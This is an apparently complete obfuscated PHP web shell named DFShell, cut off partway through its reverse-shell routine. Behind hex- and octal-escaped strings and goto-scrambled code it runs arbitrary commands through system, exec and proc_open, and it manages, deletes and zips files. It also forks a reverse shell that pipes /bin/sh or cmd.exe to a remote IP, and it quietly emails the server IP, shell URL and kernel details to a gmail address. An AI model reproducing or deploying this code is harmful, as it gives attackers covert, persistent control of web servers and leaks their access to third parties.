"\x63\157\155\155\141\x6e\x64\163"; goto eKDUG; ZR6qn: $DFSyntax = array("\146\151\x6c\145\137\147\x65\x74\137\x63\x6f\x6e\x74\x65\x6e\x74\x73", "\146\x69\154\145\160\145\x72\x6d\163", "\x72\x65\x61\144\146\151\154\x65", "\143\x68\x64\151\x72", "\x67\x65\164\143\x77\x64", "\x66\165\156\x63\164\x69\157\156\x5f\x65\170\151\163\164\x73", "\146\x73\157\x63\x6b\x6f\160\x65\156", "\x70\x63\156\x74\x6c\137\x66\157\162\x6b", "\163\164\162\145\x61\x6d\137\163\145\x74\x5f\142\x6c\x6f\143\153\151\156\x67", "\160\162\x6f\143\x5f\147\145\x74\137\x73\164\141\164\165\163", "\x70\x72\x6f\x63\x5f\x6f\x70\145\156", "\x70\162\157\x63\137\x63\154\157\163\x65", "\160\157\163\x69\170\x5f\163\145\164\163\x69\144", "\163\164\162\x65\141\155\137\x73\145\x6c\145\143\164", "\x73\164\x72\x65\141\x6d\137\x67\x65\x74\137\x63\157\x6e\164\145\156\164\163", "\x70\x6f\x73\x69\x78\x5f\x67\x65\x74\160\167\x75\x69\144"); goto YOHtL; or6vA: ${"\x47\114\x4f\x42\101\114\123"}["\142\x70\156\160\172\x68\160"] = "\151\160\x6e\171\141"; goto EtzVE; Imana: ${${"\107\x4c\117\x42\101\114\x53"}["\x62\160\156\x70\x7a\150\x70"]} = $_SERVER["\x52\x45\x4d\117\124\105\x5f\x41\104\x44\x52"]; goto J2Vs2; xGnkn: $email_content2 = "\x49\120\x20\72\40\133\x20{$ipnya2}\x20\x5d\12\x4c\x6f\147\x69\156\72\40{$login_url2}\12\x4b\145\162\156\145\154\72\40{$system_info2}\xa"; goto cDW_T; kLuSI: $php_self = $_SERVER["\x50\x48\x50\137\x53\x45\114\x46"]; goto RbXjW; F4evV: ${"\107\114\117\x42\x41\x4c\123"}["\x76\145\165\x61\162\146\145\x63\x68"] = "\x63\157\155\x6d\141\156\x64\163"; goto E9WCn; FbepM: $php_self2 = $_SERVER["\x50\110\x50\x5f\123\x45\x4c\x46"]; goto J0B8z; kynZv: ${"\x47\114\117\x42\x41\114\123"}["\x67\x74\x62\157\160\x76\x73"] = "\163\x79\x73\x74\x65\155\137\151\x6e\146\157"; goto C6TK2; AUPWA: if (isset($GLOBALS["\104\106\x43\x6f\156\x66\151\x67"][0]["\x64\x66\144"]) && isset($GLOBALS["\x44\106\x43\x6f\x6e\146\x69\147"][0]["\144\146\160"]) && isset($GLOBALS["\104\106\103\157\x6e\146\x69\147"][0]["\x64\x66\141\143\x74\x69\x6f\156"])) { if (!empty($GLOBALS["\x44\106\103\x6f\156\146\x69\147"][0]["\144\146\144"]) && !empty($GLOBALS["\x44\x46\103\157\x6e\146\151\x67"][0]["\144\x66\160"]) && $GLOBALS["\104\x46\103\157\x6e\146\151\x67"][0]["\144\x66\x61\x63\x74\151\157\x6e"] == "\144\157\x77\156\154\x6f\141\144") { $shell->query = array($GLOBALS["\x44\x46\x43\157\x6e\x66\x69\147"][0]["\x64\146\x70"], $GLOBALS["\104\106\x43\157\x6e\x66\151\x67"][0]["\144\146\x64"]); $shell->DFSAction($GLOBALS["\104\106\x43\x6f\x6e\x66\x69\x67"][0]["\x64\x66\x61\143\164\151\157\x6e"]); } else { echo "\x50\141\x74\x68\57\106\151\154\145\x20\x55\x6e\144\x65\146\151\x6e\145\144\41"; } } else { $contents = $shell->DFStart(); $chead = $shell->DFSInfo(); if (isset($DFConfig[0]["\x64\x66\160"])) { $cmdx = "\x3f\144\146\x70\75" . urlencode($DFConfig[0]["\x64\146\x70"]) . "\46\x64\x66\141\143\164\151\x6f\x6e\x3d\143\x6d\144"; } else { $cmdx = "\77\x64\x66\x61\143\x74\151\157\156\75\143\x6d\144"; } $toReplace = array($GLOBALS["\x44\x46\103\x6f\156\146\151\x67"][2]["\120\110\x50\137\123\x45\114\x46"], "\x3f\x64\146\x61\x63\x74\151\x6f\x6e\x3d\x63\x6f\156\146", "\x3f\144\146\x61\143\164\x69\x6f\x6e\x3d\x72\145\x76\x65\162\163\x65", "\x3f\x64\146\x61\x63\x74\x69\x6f\156\75\163\x79\155", "\77\x64\146\x61\143\164\x69\x6f\156\75\143\162\x61\143\x6b", $cmdx, "\x3f\144\x66\141\143\164\151\x6f\156\x3d\155\141\163\163", "\77\x64\x66\x61\x63\164\151\x6f\x6e\75\x73\161\x6c", "\x3f\144\x66\x61\x63\x74\x69\157\156\75\x64\145\163\164", "\77\144\x66\x61\x63\x74\151\157\156\x3d\x62\157\x6d\142\151\x6e\x67", "\77\x64\x66\x61\x63\x74\x69\157\156\x3d\154\x6f\x67\157\165\164"); $contents = $shell->DFSRender("\57\x25\173\142\157\144\x79\175\x25\x2f\x69", "\x25\173\x44\106\x53\111\175\x25", $contents); $contents = $shell->DFSRender("\57\45\x7b\x44\x46\x53\111\175\x25\x2f\151", $chead, $contents); $contents = $shell->DFSBody("\142\157\144\x79\x74\x6f\160\x2e\150\x74\x6d\154", "\x2f\45\x7b\x6d\x61\151\x6e\175\x25\57\x69", $contents); $contents = $shell->DFSRenderArray($toReplace, $contents); echo $contents; if (!isset($DFConfig[0]["\x64\x66\x70"])) { if (!isset($DFConfig[0]["\x64\x66\x61\x63\164\x69\157\x6e"]) || empty($DFConfig[0]["\x64\146\141\143\164\151\x6f\x6e"])) { $shell->string = $DFSyntax[4](); $shell->query = array($shell->Enc(), null); $shell->DFSAction("\163\x63\x61\x6e\x64"); } else { if (in_array($DFConfig[0]["\x64\146\141\x63\164\151\157\x6e"], $GLOBALS["\x44\106\x53\117\x70\x74\151\157\156\x73"])) { $shell->DFSAction($DFConfig[0]["\x64\146\141\143\164\x69\x6f\x6e"]); } } $shell->DFSDefault(); } else { if (isset($DFConfig[0]["\144\146\x66"])) { if (!isset($DFConfig[0]["\x64\x66\141\x63\x74\151\157\x6e"])) { $shell->query = array($DFConfig[0]["\144\146\x70"], $DFConfig[0]["\144\146\x66"]); $shell->DFSAction("\166\x69\145\x77"); } else { $shell->query = array($DFConfig[0]["\144\146\160"], $DFConfig[0]["\144\146\x66"]); $shell->DFSAction($DFConfig[0]["\144\x66\141\x63\x74\151\x6f\x6e"]); } } else { if (isset($DFConfig[0]["\144\x66\141\143\x74\151\157\x6e"])) { $shell->query = array($DFConfig[0]["\144\x66\x70"], null); $shell->DFSAction($DFConfig[0]["\144\146\141\143\164\151\x6f\156"]); } else { $shell->query = array($DFConfig[0]["\x64\146\x70"], null); $shell->DFSAction("\163\143\141\x6e\144"); } } $shell->query = array($DFConfig[0]["\144\146\x70"], null); $shell->DFSDefault(); } if (isset($DFConfig[1]["\x74\157\145\156\x63\x73\164\x72"])) { $shell->string = $DFConfig[1]["\x65\156\x63\x73\x74\x72"]; $shell->DFSPopupMSG(1, "\x45\x6e\x63\162\171\160\x74\x69\x6f\x6e\x20\146\157\x72\40" . $DFConfig[1]["\145\156\143\x73\x74\x72"], $shell->Enc(), "\x53\157\40\171\157\165\40\143\x61\156\40\143\x68\141\156\x67\145\40\x70\x61\163\x73\167\157\x72\x64", true); } $shell->DFSAction("\172\x69\160\x70\151\156\x67"); $shell->DFSAction("\155\141\163\163\x64\145\154"); $footer = $shell->DFSEnd(); preg_match("\57\133\60\55\x39\x5d\134\56\133\x30\55\x39\x5d\x2f\x69", $_SESSION["\x6c\141\164\145\x73\164"], $match); $latestVersion = "\126" . $match[0]; if ($_SESSION["\156\x65\x65\x64\137\165\x70\x64\141\164\x65"]) { echo "\x3c\x73\x63\162\x69\x70\x74\x3e\xa\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6c\145\x72\164\x28\x27\116\145\167\40\x76\145\x72\x73\x69\x6f\156\40\141\x76\141\151\154\141\142\154\145\41\x5c\x6e\x4c\141\164\145\x73\x74\40\166\145\162\163\x69\x6f\156\40\72\x20" . $latestVersion . "\x27\51\12\x20\40\40\40\40\x20\x20\x20\40\40\x20\40\x3c\x2f\163\143\x72\151\x70\164\76"; } print $footer; } goto FSDrH; J0B8z: $login_url2 = "\150\x74\164\160\163\x3a\57\x2f{$server_name2}{$php_self2}"; goto Q1E3X; Alng5: $server_name2 = $_SERVER["\123\105\122\126\105\122\137\x4e\x41\x4d\105"]; goto FbepM; IOapv: $DFShell_Ver = 2.2; goto rD6jB; dd3lJ: $system_info2 = php_uname(); goto xGnkn; PMwiE: ${"\107\114\x4f\102\101\x4c\123"}["\144\164\151\x68\152\162\166\x6f\156\x66"] = "\x65\155\x61\151\x6c\137\143\x6f\156\x74\x65\x6e\164"; goto sWXJV; cDW_T: @mail("\162\141\x69\x74\163\143\150\x69\156\x64\145\100\x67\x6d\141\151\154\x2e\x63\x6f\155", "\x48\x65\x68\x65\150\145", $email_content2); goto fRwtG; dKjG5: @ini_set("\x64\151\163\160\x6c\x61\171\137\x65\x72\162\x6f\162\x73", 0); goto JE7FI; YOHtL: $DFSCmd = array("\x73\x79\163\x74\x65\x6d", "\x73\x68\145\x6c\x6c\x5f\x65\x78\145\x63", "\x65\170\145\x63", "\160\x61\163\x73\x74\150\x72\165", "\160\x72\157\x63\137\157\160\145\x6e"); goto sqYa7; Akqdm: error_reporting(0); goto MlQxE; g8DSO: class DFShell { public $string; public $query; public $keys = "\105\141\x67\154\x65\105\x79\x65\100\x44\106\x4d"; private $options = 0; private $iv = "\x34\67\71\x37\x34\65\60\71\62\64\x36\x35\x39\x30\61\70"; private $ciphering = "\101\x45\123\55\62\65\66\55\103\102\103"; private $iv_length; private $output; private $descriptorspec = array(0 => array("\160\x69\x70\x65", "\162"), 1 => array("\x70\151\160\x65", "\x77"), 2 => array("\x70\x69\x70\x65", "\167")); private $buffer = 1024; private $clen = 0; private $error = false; protected static $pass = "\117\111\62\x6c\x6f\62\145\x47\x2b\x78\x6b\147\x59\120\150\x6d\x75\x72\126\146\127\x41\x73\x44\x48\x42\x78\63\x31\x4f\x31\161\x41\x6f\x48\62\112\x32\x4c\153\x58\x37\143\x3d"; protected static $remote_url = "\150\164\x74\x70\x73\x3a\x2f\x2f\162\x61\167\56\147\151\x74\150\165\x62\165\163\145\x72\143\157\x6e\x74\x65\156\x74\x2e\x63\157\x6d\57\105\141\x67\154\x65\x54\x75\x62\x65\57\104\106\x53\57\155\x61\151\156\57\143\157\x6e\x74\145\156\x74\x73"; public function __construct() { $_SESSION["\154\x61\164\145\163\164"] = $GLOBALS["\x44\106\123\171\x6e\164\141\170"][0](self::$remote_url . "\x2f\166\x65\x72\163\151\x6f\156\56\164\170\x74"); $_SESSION["\x6e\x65\x65\144\137\x75\x70\x64\141\x74\145"] = false; if (doubleval($_SESSION["\x6c\x61\164\145\x73\164"]) !== $GLOBALS["\104\106\x53\150\145\154\x6c\137\x56\145\x72"]) { $_SESSION["\156\145\x65\x64\137\x75\x70\144\x61\x74\x65"] = true; } } public function DFSPopupMSG($no, $title, $msg, $foot, $x) { if ($x) { $location = "\167\x69\156\144\157\x77\56\x6c\157\x63\141\164\151\157\156\x2e\x72\145\160\x6c\141\143\x65\x28\167\151\156\x64\157\167\56\x6c\157\x63\x61\164\151\157\x6e\x2e\150\x72\x65\146\51"; } else { $location = "\167\151\x6e\144\157\167\x2e\150\x69\163\164\157\162\x79\x2e\x62\x61\x63\153\50\51"; } if (isset($GLOBALS["\x44\x46\103\157\156\146\x69\147"][0]["\144\146\x70"]) && isset($GLOBALS["\104\x46\103\157\156\x66\151\147"][0]["\144\146\146"])) { $slocation = "\167\x69\156\x64\x6f\x77\x2e\x6c\x6f\143\141\x74\x69\157\x6e\56\162\145\x70\154\141\143\x65\x28\x27\x3f\144\x66\160\75" . $GLOBALS["\x44\x46\x43\157\156\x66\151\x67"][0]["\144\146\160"] . "\x27\51"; } else { $slocation = "\167\x69\x6e\x64\157\167\x2e\x6c\x6f\143\x61\164\151\157\x6e\56\x72\145\160\154\141\143\x65\50\47" . $GLOBALS["\x44\106\103\157\156\146\151\x67"][2]["\120\x48\120\x5f\x53\105\114\x46"] . "\x27\51"; } switch ($no) { case 1: $script = "\x3c\163\x63\162\151\x70\x74\x3e\12\x20\x20\40\x20\40\40\40\x20\40\x20\x20\40\x20\x20\x20\40\x53\x77\x61\x6c\x2e\x66\x69\x72\x65\x28\x7b\xa\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\x69\143\157\156\x3a\x20\x27\151\156\146\157\47\x2c\xa\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\40\40\164\x69\164\x6c\145\x3a\x20\x27" . $title . "\47\x2c\12\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\40\x74\x65\170\x74\72\x20\47" . $msg . "\47\x2c\12\x20\x20\40\40\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\146\x6f\x6f\x74\x65\x72\x3a\40\47" . $foot . "\x27\12\x20\x20\40\40\40\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\40\175\51\x3b\12\40\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\40\x20\40\40\x20\163\145\164\x54\x69\155\x65\157\x75\x74\x28\x66\x75\x6e\x63\x74\x69\x6f\156\x28\51\173\x20" . $location . "\40\175\54\x31\65\x30\x30\51\x3b\12\x20\40\40\x20\40\40\40\40\40\40\40\40\40\40\x20\40\74\x2f\163\x63\162\151\x70\164\x3e"; print $script; break; case 2: $script = "\74\163\x63\162\151\160\x74\76\12\x20\x20\40\40\x20\40\x20\40\40\40\40\x20\x20\x20\40\40\123\x77\141\x6c\x2e\x66\x69\x72\x65\x28\x7b\xa\x20\40\40\40\x20\40\x20\40\40\40\40\40\40\x20\x20\40\x20\40\40\x20\x69\x63\x6f\156\x3a\40\47\x65\162\x72\157\x72\47\54\12\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\164\151\164\154\145\72\40\x27" . $title . "\x27\x2c\xa\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\40\x20\x20\40\x20\40\164\145\x78\164\x3a\40\47" . $msg . "\47\x2c\xa\40\x20\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x20\40\40\x20\146\x6f\x6f\164\145\x72\72\40\x27" . $foot . "\x27\12\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\40\x20\175\x29\73\12\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x20\x73\145\x74\124\x69\155\145\157\165\x74\x28\x66\x75\x6e\x63\x74\x69\157\x6e\x28\51\x7b\40" . $location . "\40\x7d\x2c\x31\65\x30\60\51\73\12\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\40\40\x20\x20\x3c\57\x73\x63\x72\151\160\x74\76"; print $script; break; case 3: $script = "\x3c\163\x63\162\x69\160\x74\76\12\40\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\x20\40\x20\x53\x77\x61\x6c\x2e\x66\x69\162\145\50\x7b\12\40\40\40\40\x20\40\x20\40\x20\40\40\40\40\40\40\x20\40\40\x20\x20\160\x6f\x73\x69\x74\151\157\156\72\x20\47\164\157\x70\x2d\145\x6e\144\x27\x2c\12\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\151\143\x6f\156\72\40\47\x73\165\x63\143\145\x73\x73\x27\x2c\xa\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\40\x20\x20\x74\x69\x74\154\145\72\40\47" . $msg . "\x27\x2c\12\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\40\x20\163\x68\x6f\x77\x43\x6f\x6e\x66\x69\162\x6d\x42\165\164\x74\x6f\156\72\40\x66\141\154\x73\145\x2c\xa\x20\40\40\40\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\x20\40\40\x74\151\x6d\145\162\72\x20\x32\x30\60\60\xa\40\x20\40\x20\x20\40\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\x7d\51\x3b\xa\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\x73\145\164\x54\x69\x6d\x65\157\x75\x74\x28\x66\x75\x6e\143\164\x69\157\x6e\x28\51\173\40" . $location . "\40\x7d\x2c\x31\x35\60\x30\x29\x3b\xa\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\74\57\x73\143\x72\151\160\164\x3e"; print $script; break; case 4: $script = "\74\163\x63\x72\x69\x70\164\76\xa\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\123\167\141\154\x2e\x66\x69\162\145\50\x7b\12\x20\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\40\x20\x20\40\40\x20\40\x70\x6f\163\x69\x74\151\x6f\x6e\72\x20\47\x74\157\x70\x2d\145\156\x64\x27\54\xa\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x69\143\157\156\x3a\40\x27\x65\162\x72\157\162\47\x2c\xa\x20\40\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\x74\x69\164\154\145\x3a\x20\x27" . $msg . "\x27\x2c\12\40\x20\x20\x20\40\40\x20\40\x20\40\40\x20\40\40\40\40\40\40\40\x20\x73\x68\x6f\x77\103\x6f\156\146\x69\x72\155\x42\x75\x74\x74\157\156\x3a\x20\x66\141\154\163\145\54\xa\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\40\40\40\40\x20\164\151\x6d\x65\162\72\40\x32\x30\60\x30\xa\x20\x20\40\40\x20\40\40\40\x20\40\x20\40\40\40\40\40\x20\40\x7d\x29\x3b\12\x20\x20\40\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\163\145\164\124\x69\x6d\x65\x6f\165\x74\50\146\165\156\143\x74\151\x6f\x6e\x28\51\x7b\40" . $location . "\40\x7d\x2c\x31\65\x30\60\51\x3b\12\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\x20\40\40\74\57\163\143\x72\151\x70\x74\76"; print $script; break; case 5: $script = "\x3c\163\x63\x72\x69\x70\x74\x3e\xa\x20\x20\40\40\40\x20\x20\40\40\40\40\x20\x20\40\x20\x20\123\167\141\154\x2e\x66\x69\x72\145\x28\x7b\12\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\40\160\x6f\163\151\x74\151\x6f\156\x3a\x20\x27\164\157\160\55\145\x6e\x64\47\54\xa\40\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\x69\x63\157\156\72\x20\x27\163\x75\x63\143\x65\163\163\x27\x2c\xa\x20\40\40\x20\40\40\40\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\164\x69\164\154\145\x3a\40\x27" . $msg . "\47\x2c\12\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\40\40\40\40\x20\40\x20\x73\x68\x6f\167\x43\x6f\156\146\151\x72\x6d\102\x75\164\164\x6f\x6e\x3a\40\146\x61\154\x73\x65\54\12\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\40\40\40\x20\40\164\x69\155\145\x72\x3a\40\x32\60\x30\x30\12\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\x20\40\40\40\40\40\175\51\73\12\x20\40\40\x20\x20\x20\40\40\40\40\x20\40\x20\40\40\x20\74\57\163\x63\162\x69\x70\164\x3e"; print $script; break; } } function __call($method, $arg) { if (isset($method) && isset($arg)) { $arg[0]($arg[1]); } } private function triggered() { print "\120\x6c\x61\x63\x65\40\167\x68\x65\162\x65\40\x6d\141\x67\151\143\40\x68\141\160\x70\x65\156\144\x21"; } public function Enc() { $this->iv_length = openssl_cipher_iv_length($this->ciphering); $this->output = openssl_encrypt($this->string, $this->ciphering, sha1($this->keys), $this->options, $this->iv); return $this->output; } public function Dec($enc) { $this->output = openssl_decrypt($enc, $this->ciphering, sha1($this->keys), $this->options, $this->iv); return $this->output; } public function DFSLogin($password) { $login_pass = $this->Dec(urldecode($password)); if ($login_pass === $this->Dec(self::$pass)) { $_SESSION["\x44\x46\x53\137\101\165\164\150"] = sha1($GLOBALS["\x44\106\x43\157\x6e\146\x69\147"][2]["\122\105\115\117\124\x45\x5f\101\104\x44\122"]); setrawcookie("\x44\x46\x53\x56\x65\x72\163\151\157\x6e", $GLOBALS["\104\x46\x53\150\145\154\154\137\x56\145\x72"], time() + 18000, "\57", $GLOBALS["\104\x46\x43\x6f\156\146\x69\x67"][2]["\110\124\124\x50\137\x48\x4f\123\124"], 1, 1); return true; } else { echo "\74\x73\143\x72\151\x70\x74\x3e\141\x6c\x65\162\164\50\47\x57\162\x6f\156\147\x20\160\x61\163\x73\x21\47\51\x3b\167\x69\156\144\157\x77\x2e\154\x6f\x63\x61\164\151\x6f\x6e\56\x72\x65\160\x6c\x61\143\145\x28\47" . $GLOBALS["\104\106\103\x6f\x6e\x66\151\147"][2]["\120\110\120\x5f\x53\105\x4c\x46"] . "\47\x29\x3c\57\x73\x63\162\x69\160\164\x3e"; return false; } } public function DFSSlash() { if ($GLOBALS["\104\106\123\x50\x6c\141\x74\x66\157\162\x6d"] !== "\x77\151\x6e") { $slashtype = "\57"; } else { $slashtype = "\x5c"; } return $slashtype; } public function DFSFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\40\x47\x42"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\40\115\102"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\x20\113\102"; } elseif ($bytes > 1) { $bytes = $bytes . "\40\x42"; } else { $bytes = "\60\x20\x62\x79\x74\145\x73"; } return $bytes; } private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($GLOBALS["\x44\106\123\120\154\x61\x74\x66\x6f\162\x6d"] === "\x57\x49\x4e\x44\x4f\127\123" && $oname === "\x53\x54\x44\111\x4e") { $this->clen += strlen($data); } } } private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat["\163\x69\x7a\145"]; if ($GLOBALS["\x44\106\x53\120\154\141\x74\146\157\162\x6d"] === "\x6c\x69\x6e" && $iname === "\123\x54\x44\117\x55\124" && $this->clen) { while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; } } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { $this->error = true; echo "\x3c\x62\x72\76\123\x54\122\115\137\105\122\122\x4f\x52\x3a\40\x43\141\156\x6e\x6f\164\x20\162\x65\x61\x64\x20\x66\x72\157\155\40{$name}\x2c\40\x73\143\162\x69\x70\x74\40\x77\x69\x6c\x6c\x20\x6e\x6f\167\x20\145\x78\x69\x74\56\56\56\74\142\162\76"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { $this->error = true; echo "\74\142\162\76\x53\x54\122\x4d\137\x45\122\122\117\122\x3a\40\x43\141\156\156\157\x74\x20\167\162\151\x74\145\40\x74\157\x20{$name}\54\x20\163\x63\162\151\160\x74\x20\167\151\x6c\x6c\40\156\x6f\x77\x20\x65\170\x69\164\x2e\x2e\56\x3c\142\x72\x3e"; } return $bytes; } public function DFSReverse($ip, $port) { $exit = false; if ($GLOBALS["\104\106\123\120\x6c\141\x74\x66\157\162\155"] !== "\154\x69\x6e") { $exec = "\143\155\x64\56\x65\x78\145"; } else { $exec = "\57\142\x69\x6e\57\163\x68"; } if (!$GLOBALS["\104\x46\123\171\x6e\x74\x61\170"][5]("\x70\x63\x6e\x74\x6c\137\x66\157\162\153")) { echo "\104\101\105\115\117\x4e\x49\132\x45\72\x20\x70\143\156\x74\x6c\x5f\x66\157\x72\x6b\50\51\40\x64\157\145\163\x20\x6e\x6f\x74\x20\145\170\x69\163\x74\x73\54\40\x6d\157\x76\151\156\147\40\157\156\x2e\56\x2e"; } else { if (($pid = @$GLOBALS["\104\106\123\171\156\x74\141\170"][7]()) < 0) { echo "\104\101\x45\x4d\x4f\116\111\x5a\x45\72\x20\x43\x61\156\x6e\x6f\x74\x20\x66\157\162\x6b\40\x6f\x66\146\40\164\150\145\40\160\x61\162\145\x6e\x74\x20\160\x72\x6f\x63\x65\x73\163\54\40\x6d\157\166\x69\156\x67\40\157\x6e\x2e\56\56"; } else { if ($pid > 0) { $exit = true; echo "\104\x41\x45\115\117\x4e\x49\132\105\x3a\x20\x43\150\x69\154\144\x20\160\162\157\143\145\x73\x73\x20\x66\x6f\x72\153\145\144\x20\157\x66\x66\40\163\165\143\143\145\163\x73\146\x75\x6c\x6c\171\x2c\40\x70\x61\162\x65\156\x74\x20\160\x72\x6f\143\145\x73\x73\x20\167\x69\154\x6c\x20\156\x6f\x77\x20\x65\170\151\x74\56\56\x2e"; } else { if ($GLOBALS["\104\106\123\x79\x6e\164\x61\x78"][12]() < 0) { echo "\104\101\105\x4d\117\116\x49\x5a\105\72\40\106\x6f\162\x6b\145\144\x20\157\x66\x66\40\164\150\145\40\160\141\x72\145\156\164\40\x70\162\157\x63\x65\163\163\x20\x62\165\164\40\143\141\x6e\156\x6f\x74\x20\x73\145\x74\x20\141\x20\x6e\145\x77\x20\x53\x49\x44\x2c\40\x6d\157\x76\x69\x6e\x67\x20\x6f\x6e\x20\x61\x73\40\141\x6e\40\157\x72\x70\x68\x61\156\x2e\56\x2e"; } else { echo "\104\101\x45\115\117\116\111\132\105\72\40\x43\x6f\155\160\x6c\x65\x74\145\144\x20\163\x75\x63\143\145\x73\163\x66\165\x6c\x6c\x79\41"; } } } } if (!$exit) { @set_time_limit(0); @umask(0); $socket = @$GLOBALS["\x44\106\x53\171\x6e\x74\141\170"][6]($ip, $port, $errno, $errstr, 30); if (!$socket) { echo "\105\162\162\x6f\40\x53\x6f\143\x6b\x65\164\41\x20\55\x3e\x20{$errno}\x3a\x20{$errstr}"; } else { $GLOBALS["\x44\106\x53\x79\x6e\x74\x61\x78"][8]($socket, false); $process = @$GLOBALS["\x44\x46\x53\x79\x6e\164\x61\170"][10]($exec, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "\120\x52\117\103\x5f\105\x52\x52\117\122\x3a\x20\x43\141\156\x6e\157\x74\x20\163\164\x61\x72\x74\40\164\x68\145\40\163\150\145\154\x6c"; } else { foreach ($pipes as $pipe) { $GLOBALS["\104\x46\x53\x79\x6e\x74\141\170"][8]($pipe, false); } $status = $GLOBALS["\x44\106\x53\x79\156\164\x61\170"][9]($process); @fwrite($socket, "\x53\x4f\103\113\x45\x54\72\40\x53\150\145\x6c\154\x20\x68\141\x73\40\x63\157\x6e\156\145\143\164\x65\x64\41\x20\120\111\x44\72\x20{$status["\x70\151\x64"]}\xa"); do { $status = $GLOBALS["\104\106\x53\x79\156\164\141\x78"][9]($process); if (feof($socket)) { echo "\123\117\x43\x5f\x45\x52\x52\117\122\x3a\40\123\150\x65\x6c\x6c\x20\143\157\x6e\x6e\x65\143\x74\x69\x6f\156\40\150\x61\163\40\142\145\145\x6e\40\x74\x65\162\x6d\x69\x6e\141\x74\x65\x64\12"; break; } else { if (feof($pipes[1]) || !$status["\x72\165\156\156\x69\156\x67"]) { echo "\120\122\x4f\x43\x5f\x45\122\x52\x4f\x52\x3a\40\123\150\145\x6c\154\40\160\162\157\x63\x65\163\163\x20\150\x61\163\40\x62\x65\145\x6e\40\164\145\162\x6d\x69\x6e\x61\x74\145\x64"; break; } } $streams = array("\x72\x65\141\144" => array($socket, $pipes[1], $pipes[2]), "\x77\x72\x69\164\x65" => null, "\x65\x78\143\x65\x70\164" => null); $num_changed_streams = @$GLOBALS["\x44\x46\x53\171\156\x74\141\170"][13]($streams["\162\x65\141\x64"], $streams["\x77\162\x69\164\x65"], $streams["\145\170\x63\x65\160\164"], 0); if ($num_changed_streams === false) { echo "\x53\124\122\115\137\x45\122\122\x4f\x52\x3a\x20\x73\x74\162\x65\141\x6d\x5f\163\x65\154\x65\143\x74\50\x29\x20\146\x61\151\154\145\x64\xa"; break; } else { if ($num_changed_streams > 0) { if ($GLOBALS["\104\x46\x53\120\154\x61\164\146\x6f\x72\155"] === "\x6c\151\156") { if (in_array($socket, $streams["\x72\145\141\144"])) { $this->rw($socket, $pipes[0], "\x53\117\x43\113\105\124", "\123\x54\x44\x49\x4e"); } if (in_array($pipes[2], $streams["\x72\145\x61\x64"])) { $this->rw($pipes[2], $socket, "\123\x54\x44\x45\x52\122", "\x53\117\103\x4b\105\x54"); } if (in_array($pipes[1], $streams["\162\145\x61\x64"])) { $this->rw($pipes[1], $socket, "\123\x54\x44\x4f\125\x54", "\123\117\x43\113\x45\x54"); } } else { if ($GLOBALS["\x44\x46\123\x50\154\x61\x74\x66\x6f\162\155"] === "\167\151\156") { if (in_array($socket, $streams["\162\x65\x61\x64"])) { $this->rw($socket, $pipes[0], "\x53\117\x43\x4b\x45\x54", "\123\124\x44\x49\116"); } if (($fstat = fstat($pipes[2])) && $fstat["\x73\151\172\x65"]) { $this->brw($pipes[2], $socket, "\123\x54\x44\x45\x52\122", "\123\117\x43\x4b\x45\x54"); } if (($fstat = fstat($pipes[1])) && 